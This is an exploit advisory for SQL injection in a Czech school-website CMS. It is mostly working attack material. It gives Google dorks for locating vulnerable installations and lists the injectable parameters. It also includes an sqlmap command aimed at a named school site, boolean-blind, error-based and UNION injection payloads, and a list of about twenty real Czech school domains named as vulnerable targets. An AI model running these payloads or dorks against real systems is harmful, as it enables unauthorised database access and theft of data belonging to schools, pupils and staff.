############################################################ # Exploit Title : Vitalex Computers SRO Tvorba A!kolnAch webu 1.0 SQL Injection # Exploit Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepages : vitalex.cz # Google Dork 1 : intext:'' Vitalex Computers - Tvorba A!kolnAch webu'' site:cz # Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz # Google Dork 3 : inurl:''/public/printAction.php?id='' # Exploit Risk : Medium # Category : WebApps # Version Information : 1.0 + TinyMCE 4.0 - FancyBox2.1.5 - jQuery1.12.2 - jQuery UI1.11.4 - + CodeMirror 5.20.2 # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236 ############################################################ Czech Copyright A(c) 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba A!kolnAch webu SQL Injection Vulnerability ############################################################ # Admin Panel Login Path : /administrator/ Other Possible Dorks => inurl:''/public/printCalendar.php'' site:cz inurl:''/public/printFood.php'' site:cz inurl:''/public/script.php'' site:cz inurl:''/public/setTemplate.php'' site:cz inurl:''/public/statniSvatky.php'' site:cz ############################################################ # SQL Injection Exploit => /public/printCalendar.php?id=[SQL Injection] /public/printFood.php?id=[SQL Injection] /public/script.php?id=[SQL Injection] /public/setTemplate.php?id=[SQL Injection] /public/statniSvatky.php?id=[SQL Injection] /index.php?type=Blog&id=[SQL Injection] /index.php?type=Contact&id=[SQL Injection] /index.php?type=Post&id=[SQL Injection] ############################################################ [+] SQLMAP Poc : $ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs [+] Poc SQL Injection : Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=164 AND 1041=1041 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=164 AND (SELECT 5925 FROM (SELECT COUNT(*),CONCAT(0x7162627171, (SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=164 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171, 0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a466372 49687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL-- zEWq ######################################################################################## # Example Vulnerable Sites => # zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 # skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 # spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 zas-me.cz/public/printCalendar.php?actions=1 gspsd.cz/public/printCalendar.php?actions=1 zusbenesov.cz/public/printCalendar.php?actions=2 zsmarsovska.cz/public/printCalendar.php?actions=2 zshortan.cz/public/printCalendar.php?actions=3 zsmspetrohrad.cz/public/printCalendar.php?actions=2 zsmsklecany.cz/public/printCalendar.php?actions=2 1zszatec.cz/public/printCalendar.php?actions=1 skolazrak.cz/public/printCalendar.php?actions=3 3zslouny.cz/public/printCalendar.php?actions=2 1zsjirkov.cz/public/printCalendar.php?actions=3 skolahotelnictvi.cz/public/printCalendar.php?actions=3 zsmsujezd.cz/public/printCalendar.php?actions=3 zsarnultovice.cz/public/printCalendar.php?actions=2 zuszandov.cz/public/printCalendar.php?actions=3 zsmschuchelna.cz/public/printCalendar.php?actions=3 zsprazacka.cz/public/printCalendar.php?actions=2 ####################################################################################### # Discovered By KingSkrupellos from Cyberizm Digital Security Team #######################################################################################